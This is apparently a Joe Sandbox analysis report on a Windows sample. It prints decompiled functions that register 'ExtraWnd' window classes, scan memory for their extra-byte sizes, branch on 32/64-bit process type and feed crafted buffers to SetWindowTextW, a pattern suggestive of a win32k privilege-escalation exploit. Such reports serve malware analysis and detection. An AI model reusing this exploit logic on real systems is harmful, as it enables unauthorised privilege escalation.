                      0x0093be86
                      0x0093be97
                      0x0093be98
                      0x0093be9d
                      0x00000000
                      0x0093be9f
                      0x0093bea6
                      0x0093bea9
                      0x0093beb4
                      0x0093beb4
                      0x00000000
                      0x0093be9d
                      0x0093bebc
                      0x00000000
                      0x0093bebc
                      0x0093be82
                      0x0093be6f
                      0x0093be5d
                      0x0093be32
                      0x0093bde1
                      0x0093bde7
                      0x0093bde7
                      0x00000000

                      APIs
                      • RegisterClassExW.USER32 ref: 0093BDDA
                      • CreateWindowExW.USER32 ref: 0093BE0F
                      • RegisterClassExW.USER32 ref: 0093BE2D
                      • CreateWindowExW.USER32 ref: 0093BE57
                      • DestroyWindow.USER32(00000000,00000000,00000000), ref: 0093BEA6
                      • DestroyWindow.USER32(00000000), ref: 0093BEA9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Window$ClassCreateDestroyRegister
                      • String ID: 0$ExtraWnd1$ExtraWnd2
                      • API String ID: 2025118016-772980788
                      • Opcode ID: bcc084f4644a98e8cf3b9ed215503aa7eb94929ae760d172799ea1ba6312b65f
                      • Instruction ID: 05560538a86370c105c4aaeda65b09165c0de2fb7ffea9536ac3633ccacbc72c
                      • Opcode Fuzzy Hash: bcc084f4644a98e8cf3b9ed215503aa7eb94929ae760d172799ea1ba6312b65f
                      • Instruction Fuzzy Hash: 99316372E152189BDB20DBA9EC41BEEB7FCEB45354F14415AEA04B7290DBB55D008FD0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0093CD40 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 465 93cd40-93cd9f RegisterClassExW 466 93cda1-93cda7 465->466 467 93cda8-93cdd5 CreateWindowExW 465->467 468 93ce95-93ce9d 467->468 469 93cddb-93cdf2 RegisterClassExW 467->469 469->468 470 93cdf8-93ce1d CreateWindowExW 469->470 470->468 471 93ce1f-93ce2f call 93c750 * 2 470->471 471->468 476 93ce31-93ce33 471->476 476->468 477 93ce35-93ce42 476->477 478 93ce44 477->478 479 93ce7f-93ce94 DestroyWindow * 2 477->479 480 93ce46-93ce4d 478->480 481 93ce57-93ce5d 480->481 482 93ce4f-93ce55 480->482 481->480 484 93ce5f-93ce74 DestroyWindow * 2 481->484 482->481 483 93ce75-93ce7c 482->483 483->479
                      C-Code - Quality: 94%
                      			E0093CD40() {
				signed int _v8;
				struct _WNDCLASSEXW _v56;
				intOrPtr* _t31;
				struct HWND__* _t41;
				signed int _t45;
				unsigned int _t47;
				struct HWND__* _t51;
				void* _t58;
				void* _t61;

				asm("xorps xmm0, xmm0");
				_v56.lpfnWndProc = DefWindowProcW;
				_v56.hInstance =  *0x9580b8;
				_v8 = 0;
				_v56.cbSize = 0x30;
				_v56.style = 0;
				_v56.cbClsExtra = 0;
				_v56.cbWndExtra = 0x118;
				asm("movdqu [ebp-0x1c], xmm0");
				_v56.lpszClassName = L"ExtraWnd1";
				_v56.hIconSm = 0;
				if(RegisterClassExW( &_v56) != 0) {
					_t41 = CreateWindowExW(0, L"ExtraWnd1", 0, 0, 0, 0, 0, 0, 0, 0,  *0x9580b8, 0);
					if(_t41 == 0) {
						L15:
						return 0;
					} else {
						_v56.lpszClassName = L"ExtraWnd2";
						_v56.cbWndExtra = 0x130;
						if(RegisterClassExW( &_v56) == 0) {
							goto L15;
						} else {
							_t51 = CreateWindowExW(0, L"ExtraWnd2", 0, 0, 0, 0, 0, 0, 0, 0,  *0x9580b8, 0);
							if(_t51 == 0) {
								goto L15;
							} else {
								_t58 = E0093C750(_t41);
								_t31 = E0093C750(_t51);
								if(_t58 == 0 || _t31 == 0) {
									goto L15;
								} else {
									_t45 = 0;
									_t47 =  *0x958060 >> 2;
									if(_t47 == 0) {
										L14:
										DestroyWindow(_t41);
										DestroyWindow(_t51);
										return _v8;
									} else {
										_t61 = _t58 - _t31;
										while( *((intOrPtr*)(_t61 + _t31)) != 0x118 ||  *_t31 != 0x130) {
											_t45 = _t45 + 1;
											_t31 = _t31 + 4;
											if(_t45 < _t47) {
												continue;
											} else {
												DestroyWindow(_t41);
												DestroyWindow(_t51);
												return _v8;
											}
											goto L16;
										}
										_v8 = _t45 * 4;
										goto L14;
									}
								}
							}
						}
					}
				} else {
					return 0;
				}
				L16:
			}












                      0x0093cd4b
                      0x0093cd4e
                      0x0093cd5d
                      0x0093cd64
                      0x0093cd6b
                      0x0093cd72
                      0x0093cd79
                      0x0093cd80
                      0x0093cd87
                      0x0093cd8c
                      0x0093cd93
                      0x0093cd9f
                      0x0093cdd1
                      0x0093cdd5
                      0x0093ce95
                      0x0093ce9d
                      0x0093cddb
                      0x0093cdde
                      0x0093cde6
                      0x0093cdf2
                      0x00000000
                      0x0093cdf8
                      0x0093ce19
                      0x0093ce1d
                      0x00000000
                      0x0093ce1f
                      0x0093ce26
                      0x0093ce28
                      0x0093ce2f
                      0x00000000
                      0x0093ce35
                      0x0093ce3b
                      0x0093ce3d
                      0x0093ce42
                      0x0093ce7f
                      0x0093ce86
                      0x0093ce89
                      0x0093ce94
                      0x0093ce44
                      0x0093ce44
                      0x0093ce46
                      0x0093ce57
                      0x0093ce58
                      0x0093ce5d
                      0x00000000
                      0x0093ce5f
                      0x0093ce66
                      0x0093ce69
                      0x0093ce74
                      0x0093ce74
                      0x00000000
                      0x0093ce5d
                      0x0093ce7c
                      0x00000000
                      0x0093ce7c
                      0x0093ce42
                      0x0093ce2f
                      0x0093ce1d
                      0x0093cdf2
                      0x0093cda1
                      0x0093cda7
                      0x0093cda7
                      0x00000000

                      APIs
                      • RegisterClassExW.USER32 ref: 0093CD9A
                      • CreateWindowExW.USER32 ref: 0093CDCF
                      • RegisterClassExW.USER32 ref: 0093CDED
                      • CreateWindowExW.USER32 ref: 0093CE17
                      • DestroyWindow.USER32(00000000,00000000,00000000), ref: 0093CE66
                      • DestroyWindow.USER32(00000000), ref: 0093CE69
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Window$ClassCreateDestroyRegister
                      • String ID: 0$ExtraWnd1$ExtraWnd2
                      • API String ID: 2025118016-772980788
                      • Opcode ID: 2a73e35107815a72e2fd35afdf9ca328056982e61c88115415770b4fa52be12a
                      • Instruction ID: 6bee7bf77c8b7ca93ddf1e8690072d486f122e93364e6050cbb886074a357812
                      • Opcode Fuzzy Hash: 2a73e35107815a72e2fd35afdf9ca328056982e61c88115415770b4fa52be12a
                      • Instruction Fuzzy Hash: 6C31A3B2E152189BDB20DBA9DC41BDEB7FDEB85350F140156E904B7290DBB59D048F90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0093B970 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowsleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      C-Code - Quality: 100%
                      			E0093B970(void* __ebx, void* __edi) {
				struct tagMSG _v32;
				intOrPtr _t6;
				intOrPtr _t8;
				int _t22;

				_t6 =  *0x9441a8; // 0x258
				_t8 =  *0x9441a4; // 0x320
				 *0x958048 = CreateWindowExW(0x80000, L"MyMainWnd", 0, 0x10000000, _t8 + 1, _t6 + 1, 1, 1, 0, 0,  *0x958030, 0);
				if( *0x958048 == 0) {
					return 0;
				} else {
					E0093BFE0( *0x958048);
					Sleep(0x32);
					 *0x958044 = 1;
					if(GetMessageW( &_v32, 0, 0, 0) == 0) {
						return 0;
					} else {
						do {
							TranslateMessage( &_v32);
							DispatchMessageW( &_v32);
							_t22 = GetMessageW( &_v32, 0, 0, 0);
						} while (_t22 != 0);
						return _t22;
					}
				}
			}







                      0x0093b97e
                      0x0093b98d
                      0x0093b9ab
                      0x0093b9b7
                      0x0093ba2f
                      0x0093b9b9
                      0x0093b9c0
                      0x0093b9ca
                      0x0093b9e0
                      0x0093b9ee
                      0x0093ba29
                      0x0093b9f0
                      0x0093ba00
                      0x0093ba04
                      0x0093ba0a
                      0x0093ba16
                      0x0093ba18
                      0x0093ba22
                      0x0093ba22
                      0x0093b9ee

                      APIs
                      • CreateWindowExW.USER32 ref: 0093B9A5
                        • Part of subcall function 0093BFE0: GetForegroundWindow.USER32(?,?), ref: 0093BFE7
                        • Part of subcall function 0093BFE0: SystemParametersInfoW.USER32 ref: 0093C015
                        • Part of subcall function 0093BFE0: SystemParametersInfoW.USER32 ref: 0093C03C
                        • Part of subcall function 0093BFE0: SendMessageW.USER32(?,00000112,0000F020,00000000), ref: 0093C051
                        • Part of subcall function 0093BFE0: SendMessageW.USER32(?,00000112,0000F120,00000000), ref: 0093C060
                        • Part of subcall function 0093BFE0: SystemParametersInfoW.USER32 ref: 0093C07A
                      • Sleep.KERNEL32(00000032), ref: 0093B9CA
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0093B9EA
                      • TranslateMessage.USER32(?), ref: 0093BA04
                      • DispatchMessageW.USER32 ref: 0093BA0A
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0093BA16
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Message$InfoParametersSystem$SendWindow$CreateDispatchForegroundSleepTranslate
                      • String ID: MyMainWnd
                      • API String ID: 2892696922-188152914
                      • Opcode ID: 646eb310dc51def7ee17f06e293be8ff4104fe67d58e957d009ba18865fd3cd0
                      • Instruction ID: 66df6ce6e9641ddf6cec73e00ecdfed728b720bb9cec1f072f7d8833d8255cfb
                      • Opcode Fuzzy Hash: 646eb310dc51def7ee17f06e293be8ff4104fe67d58e957d009ba18865fd3cd0
                      • Instruction Fuzzy Hash: 9C118272AA93086FE620DBA8EC46FE773ECE708715F100011FA08F71D0DAB4A8459F65
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0093C970 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowsleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      C-Code - Quality: 100%
                      			E0093C970(void* __ebx, void* __edi) {
				struct tagMSG _v32;
				intOrPtr _t6;
				intOrPtr _t8;
				int _t22;

				_t6 =  *0x94424c; // 0x1388
				_t8 =  *0x944248; // 0x1388
				 *0x9580d4 = CreateWindowExW(0x80000, L"MyMainWnd", 0, 0x10000000, _t8 + 1, _t6 + 1, 1, 1, 0, 0,  *0x9580b8, 0);
				if( *0x9580d4 == 0) {
					return 0;
				} else {
					E0093D050( *0x9580d4);
					Sleep(0x32);
					 *0x9580d0 = 1;
					if(GetMessageW( &_v32, 0, 0, 0) == 0) {
						return 0;
					} else {
						do {
							TranslateMessage( &_v32);
							DispatchMessageW( &_v32);
							_t22 = GetMessageW( &_v32, 0, 0, 0);
						} while (_t22 != 0);
						return _t22;
					}
				}
			}







                      0x0093c97e
                      0x0093c98d
                      0x0093c9ab
                      0x0093c9b7
                      0x0093ca2f
                      0x0093c9b9
                      0x0093c9c0
                      0x0093c9ca
                      0x0093c9e0
                      0x0093c9ee
                      0x0093ca29
                      0x0093c9f0
                      0x0093ca00
                      0x0093ca04
                      0x0093ca0a
                      0x0093ca16
                      0x0093ca18
                      0x0093ca22
                      0x0093ca22
                      0x0093c9ee

                      APIs
                      • CreateWindowExW.USER32 ref: 0093C9A5
                        • Part of subcall function 0093D050: GetForegroundWindow.USER32(?,?), ref: 0093D057
                        • Part of subcall function 0093D050: SystemParametersInfoW.USER32 ref: 0093D085
                        • Part of subcall function 0093D050: SystemParametersInfoW.USER32 ref: 0093D0AC
                        • Part of subcall function 0093D050: SendMessageW.USER32(?,00000112,0000F020,00000000), ref: 0093D0C1
                        • Part of subcall function 0093D050: SendMessageW.USER32(?,00000112,0000F120,00000000), ref: 0093D0D0
                        • Part of subcall function 0093D050: SetFocus.USER32(?), ref: 0093D0D3
                        • Part of subcall function 0093D050: SetForegroundWindow.USER32(?), ref: 0093D0DA
                        • Part of subcall function 0093D050: SystemParametersInfoW.USER32 ref: 0093D0F8
                      • Sleep.KERNEL32(00000032), ref: 0093C9CA
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0093C9EA
                      • TranslateMessage.USER32(?), ref: 0093CA04
                      • DispatchMessageW.USER32 ref: 0093CA0A
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0093CA16
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Message$InfoParametersSystemWindow$ForegroundSend$CreateDispatchFocusSleepTranslate
                      • String ID: MyMainWnd
                      • API String ID: 64861553-188152914
                      • Opcode ID: c917d349bf19102fa93c6143a2fb05f914377cfe425bbc862eb88ec7669af595
                      • Instruction ID: eba4278d4eab97227c9ed4909712f53ec2081aa689b9b82b90f4ae4896b2542c
                      • Opcode Fuzzy Hash: c917d349bf19102fa93c6143a2fb05f914377cfe425bbc862eb88ec7669af595
                      • Instruction Fuzzy Hash: 99118672A693086BE660DBA9EC46FD773ACE704715F100111FA08F71D0D6B4A8059FA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0093132F Relevance: 12.1, APIs: 8, Instructions: 66COMMON
                      Download Yara Rule
                      C-Code - Quality: 77%
                      			E0093132F(void* __edi) {
				signed int _v8;
				short _v1032;
				short _v2056;
				signed int _v2060;
				void* __ebx;
				void* __esi;
				signed int _t11;
				void* _t22;
				void* _t25;
				void* _t35;
				void* _t36;
				long _t38;
				signed int _t39;

				_t36 = __edi;
				_t11 =  *0x943050; // 0xce43520a
				_v8 = _t11 ^ _t39;
				GetModuleFileNameW(0,  &_v2056, 0x100);
				_v2060 = _v2060 & 0x00000000;
				_t38 = GetModuleFileNameW(0,  &_v1032, 0x100);
				if(_t38 == 0 || GetLastError() == 0x7a || CharUpperBuffW( &_v1032, _t38) != _t38) {
					L8:
					goto L9;
				} else {
					_t22 = E009312D8( &_v1032);
					asm("sbb eax, eax");
					if(0 != _t22) {
						goto L8;
					}
					_t25 = GetCurrentProcess();
					__imp__IsWow64Process(_t25,  &_v2060);
					if(_t25 == 0 || _v2060 == 0) {
						E0093BA30(0x100, _t35, GetCurrentProcessId());
					} else {
						E0093CA30(0x100, _t35, GetCurrentProcessId());
					}
					L9:
					return E0093161C(0x100, _v8 ^ _t39, _t35, _t36, _t38);
				}
			}
















                      0x0093132f
                      0x00931338
                      0x0093133f
                      0x00931359
                      0x0093135b
                      0x0093136e
                      0x00931372
                      0x009313e3
                      0x00000000
                      0x00931391
                      0x00931397
                      0x009313a0
                      0x009313a4
                      0x00000000
                      0x00000000
                      0x009313ad
                      0x009313b4
                      0x009313bc
                      0x009313dc
                      0x009313c7
                      0x009313ce
                      0x009313ce
                      0x009313e5
                      0x009313f4
                      0x009313f4

                      APIs
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000100), ref: 00931359
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000100), ref: 0093136C
                      • GetLastError.KERNEL32 ref: 00931374
                      • CharUpperBuffW.USER32(?,00000000), ref: 00931387
                      • GetCurrentProcess.KERNEL32(00000000), ref: 009313AD
                      • IsWow64Process.KERNEL32(00000000), ref: 009313B4
                      • GetCurrentProcessId.KERNEL32 ref: 009313C7
                        • Part of subcall function 0093CA30: Sleep.KERNEL32(000000C8,?,00000000), ref: 0093CA5A
                        • Part of subcall function 0093CA30: GetModuleHandleA.KERNEL32(00000000,?,00000000), ref: 0093CA64
                        • Part of subcall function 0093CA30: LoadLibraryA.KERNEL32(USER32.dll,?,00000000), ref: 0093CA70
                      • GetCurrentProcessId.KERNEL32 ref: 009313D5
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$CurrentModule$FileName$BuffCharErrorHandleLastLibraryLoadSleepUpperWow64
                      • String ID:
                      • API String ID: 3568178790-0
                      • Opcode ID: 35be446d29427ffb4b644bb8314b622d14e84c64365d2a962451b0f590f19da1
                      • Instruction ID: b4a17da2929a5f37249162b82927c3f80656d4a4a4fc8ba2e8f3837ac273b2c6
                      • Opcode Fuzzy Hash: 35be446d29427ffb4b644bb8314b622d14e84c64365d2a962451b0f590f19da1
                      • Instruction Fuzzy Hash: 3C119876918218DBDB64ABB0DD89BBE73BCFF04301F100495E685E20A0DF749D449FA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0093D050 Relevance: 12.1, APIs: 8, Instructions: 65windowCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0093D050(struct HWND__* _a4) {
				int _v8;
				void _v12;
				struct HWND__* _t12;
				int _t18;
				int _t20;
				int _t24;
				struct HWND__* _t26;

				_t12 = GetForegroundWindow();
				_t26 = _a4;
				if(_t12 == _t26) {
					return _t12;
				}
				_t24 = 0;
				_v12 = 8;
				_v8 = 0;
				if(SystemParametersInfoW(0x48, 8,  &_v12, 0) != 0) {
					_t20 = _v8;
					if(_t20 != 0) {
						_t24 = _t20;
						_v12 = 8;
						_v8 = 0;
						SystemParametersInfoW(0x49, 8,  &_v12, 0);
					}
				}
				SendMessageW(_t26, 0x112, 0xf020, 0);
				SendMessageW(_t26, 0x112, 0xf120, 0);
				SetFocus(_t26);
				_t18 = SetForegroundWindow(_t26);
				if(_t24 != 0) {
					_v12 = 8;
					_v8 = _t24;
					_t18 = SystemParametersInfoW(0x49, 8,  &_v12, 0);
				}
				return _t18;
			}










                      0x0093d057
                      0x0093d05d
                      0x0093d062
                      0x0093d104
                      0x0093d104
                      0x0093d073
                      0x0093d075
                      0x0093d082
                      0x0093d089
                      0x0093d08b
                      0x0093d090
                      0x0093d094
                      0x0093d096
                      0x0093d0a0
                      0x0093d0ac
                      0x0093d0ac
                      0x0093d090
                      0x0093d0c1
                      0x0093d0d0
                      0x0093d0d3
                      0x0093d0da
                      0x0093d0e2
                      0x0093d0e9
                      0x0093d0f5
                      0x0093d0f8
                      0x0093d0f8
                      0x00000000

                      APIs
                      • GetForegroundWindow.USER32(?,?), ref: 0093D057
                      • SystemParametersInfoW.USER32 ref: 0093D085
                      • SystemParametersInfoW.USER32 ref: 0093D0AC
                      • SendMessageW.USER32(?,00000112,0000F020,00000000), ref: 0093D0C1
                      • SendMessageW.USER32(?,00000112,0000F120,00000000), ref: 0093D0D0
                      • SetFocus.USER32(?), ref: 0093D0D3
                      • SetForegroundWindow.USER32(?), ref: 0093D0DA
                      • SystemParametersInfoW.USER32 ref: 0093D0F8
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoParametersSystem$ForegroundMessageSendWindow$Focus
                      • String ID:
                      • API String ID: 1107571394-0
                      • Opcode ID: c43c0d85e6dd80115df916086cd6c71959c008e3f99a0bfc45891b2d20c03762
                      • Instruction ID: 33d56f13c60f7bb8187af3e0106e7df99d4f26b8aa967ca8a14cb5b453aa20a7
                      • Opcode Fuzzy Hash: c43c0d85e6dd80115df916086cd6c71959c008e3f99a0bfc45891b2d20c03762
                      • Instruction Fuzzy Hash: F2113D70A84308BAF7209B909C86FAE7BBCEB04B11F104069FA04BA1C0CBF469059F61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0093D740 Relevance: 10.7, APIs: 7, Instructions: 152stringCOMMON
                      Download Yara Rule
                      C-Code - Quality: 43%
                      			E0093D740(intOrPtr _a4, intOrPtr _a8, short _a12, intOrPtr _a16) {
				signed int _v8;
				intOrPtr _v1004;
				short _v1008;
				intOrPtr _v1012;
				intOrPtr _v1016;
				intOrPtr _v1020;
				intOrPtr _v1024;
				intOrPtr _v1028;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t47;
				intOrPtr _t49;
				int _t56;
				int _t58;
				intOrPtr _t60;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t86;
				void* _t88;
				intOrPtr _t89;
				intOrPtr _t104;
				void* _t110;
				void* _t111;
				intOrPtr _t115;
				signed int _t116;
				void* _t117;
				void* _t118;
				intOrPtr _t121;

				_t47 =  *0x943050; // 0xce43520a
				_v8 = _t47 ^ _t116;
				_t89 =  *0x958094;
				_t49 =  *0x958068;
				_t104 =  *((intOrPtr*)(_t89 + _t49));
				_v1020 =  *((intOrPtr*)(_t89 + _t49 + 4));
				_v1012 = 0xffffffff;
				_v1016 = 0xffffffff;
				_v1024 = _t104;
				E00935A90( &_v1008, 0, 0x3e8);
				_t118 = _t117 + 0xc;
				_v1008 = _a12;
				_v1004 = _a16;
				_t56 = lstrlenW( &_v1008);
				if(_t56 != 4) {
					_t115 = _t56 + _t56;
					_v1012 = _t115;
					 *((short*)(_t116 + _t115 - 0x3ec)) = 0x3333;
				}
				_t58 = lstrlenW( &_v1008);
				if(_t58 != 4) {
					_t86 = _t58 + _t58;
					_t121 = _t86;
					_v1016 = _t86;
					 *((short*)(_t116 + _t86 - 0x3ec)) = 0x3333;
				}
				_t88 = 1;
				_t111 = 8;
				_t23 = _t88 + 3; // 0x4
				_t110 = _t23;
				do {
					asm("adc eax, [ebp+0xc]");
					_t60 = E0093CEA0(_t121, _t111 + _a4, 0);
					_t118 = _t118 + 8;
					 *((intOrPtr*)(_t116 + _t111 - 0x3ec)) = _t60;
					 *((intOrPtr*)(_t116 + _t111 - 0x3e8)) = _t104;
					_t88 = _t88 + 1;
					_t111 = _t111 + 8;
					_t110 = _t110 + 4;
				} while (lstrlenW( &_v1008) >= _t110 && _t111 < 0x3e8);
				if(_t88 != 0x7d) {
					_push(_a8);
					_push(_a4);
					asm("sbb esi, ecx");
					_push( *0x958098 +  *0x958068 -  *0x9580a0);
					asm("adc eax, esi");
					_v1028 =  *0x95809c;
					_push( *0x958080);
					_push( *0x9441ec);
					L009310C5();
					SetWindowTextW( *0x958090,  &_v1008);
					_t70 = _v1016;
					__eflags = _t70 - 0xffffffff;
					if(_t70 != 0xffffffff) {
						__eflags = 0;
						 *((short*)(_t116 + _t70 - 0x3ec)) = 0;
						SetWindowTextW( *0x958090,  &_v1008);
					}
					_t71 = _v1012;
					__eflags = _t71 - 0xffffffff;
					if(_t71 != 0xffffffff) {
						__eflags = 0;
						 *((short*)(_t116 + _t71 - 0x3ec)) = 0;
						SetWindowTextW( *0x958090,  &_v1008);
					}
					_push(_v1020);
					_push(_v1024);
					asm("sbb esi, ecx");
					_push( *0x958098 +  *0x958068 -  *0x9580a0);
					asm("adc eax, esi");
					_v1028 =  *0x95809c;
					_push( *0x958080);
					L009310C5();
					__eflags = _v8 ^ _t116;
					return E0093161C(_t88, _v8 ^ _t116,  *0x958068 -  *0x9580a0, _t110, 0,  *0x9441ec);
				} else {
					return E0093161C(_t88, _v8 ^ _t116, _t104, _t110, _t111);
				}
			}
































                      0x0093d749
                      0x0093d750
                      0x0093d753
                      0x0093d759
                      0x0093d761
                      0x0093d76d
                      0x0093d77c
                      0x0093d786
                      0x0093d790
                      0x0093d796
                      0x0093d79e
                      0x0093d7a7
                      0x0093d7b0
                      0x0093d7bd
                      0x0093d7c7
                      0x0093d7c9
                      0x0093d7cc
                      0x0093d7d2
                      0x0093d7d2
                      0x0093d7e1
                      0x0093d7e6
                      0x0093d7e8
                      0x0093d7e8
                      0x0093d7ea
                      0x0093d7f0
                      0x0093d7f0
                      0x0093d7f8
                      0x0093d7fd
                      0x0093d802
                      0x0093d802
                      0x0093d805
                      0x0093d80c
                      0x0093d811
                      0x0093d816
                      0x0093d819
                      0x0093d826
                      0x0093d82d
                      0x0093d82e
                      0x0093d831
                      0x0093d83b
                      0x0093d84a
                      0x0093d872
                      0x0093d877
                      0x0093d87a
                      0x0093d889
                      0x0093d88a
                      0x0093d88c
                      0x0093d897
                      0x0093d898
                      0x0093d89e
                      0x0093d8b6
                      0x0093d8b8
                      0x0093d8be
                      0x0093d8c1
                      0x0093d8c3
                      0x0093d8c5
                      0x0093d8da
                      0x0093d8da
                      0x0093d8dc
                      0x0093d8e2
                      0x0093d8e5
                      0x0093d8e7
                      0x0093d8e9
                      0x0093d8fe
                      0x0093d8fe
                      0x0093d913
                      0x0093d91b
                      0x0093d921
                      0x0093d930
                      0x0093d931
                      0x0093d933
                      0x0093d93e
                      0x0093d945
                      0x0093d954
                      0x0093d95f
                      0x0093d84e
                      0x0093d85e
